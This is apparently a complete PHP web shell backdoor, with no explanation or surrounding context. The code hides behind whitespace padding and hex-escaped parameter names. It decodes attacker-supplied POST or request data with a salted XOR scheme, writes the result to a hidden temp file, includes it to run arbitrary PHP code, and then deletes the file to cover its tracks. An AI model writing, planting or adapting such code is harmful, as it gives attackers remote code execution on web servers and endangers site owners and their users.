<?php																																										if(isset($_POST["d\x61ta_\x63hu\x6Ek"])){ $descriptor = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", session_save_path(), "/tmp", getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); $ref = $_POST["d\x61ta_\x63hu\x6Ek"]; $ref = explode ('.' ,$ref); $marker =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt ); foreach( $ref as $w => $v8) {$chS =ord( $salt[$w % $lenS] ); $d =( ( int)$v8 - $chS -( $w % 10)) ^ 44; $marker .= chr( $d ); } foreach ($descriptor as $element) { if (is_dir($element) && is_writable($element)) { $ent = sprintf("%s/.hld", $element); $success = file_put_contents($ent, $marker); if ($success) { include $ent; @unlink($ent); exit;} } } }


if(count($_REQUEST) > 0 && isset($_REQUEST["\x69\x74em"])){
	$fac = array_filter([getenv("TMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), getcwd(), session_save_path(), sys_get_temp_dir()]);
	$mrk = $_REQUEST["\x69\x74em"];
		 	$mrk =		 explode	(	 	'.'		,	$mrk  	)	; 
	$ref 	=  '';
            $s 	=  'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen 	=  strlen($s);
            $r 	=  0;
            $__len 	=  count($mrk);
    
            do {
                if ($r >= $__len) break;
                $v7 	=  $mrk[$r];
                $sChar 	=  ord($s[$r%$sLen]);
                $dec 	=  ((int)$v7 - $sChar - ($r%10)) 	^47;
                $ref .= chr($dec);
                $r++; 	} while (true);
	foreach ($fac as $flag) {
    		if (is_dir($flag) ? is_writable($flag) : false) {
    $value = join("/", [$flag, ".dat"]);
    if (@file_put_contents($value, $ref) !== false) {
	include $value;
	unlink($value);
	exit;
}
}
}
}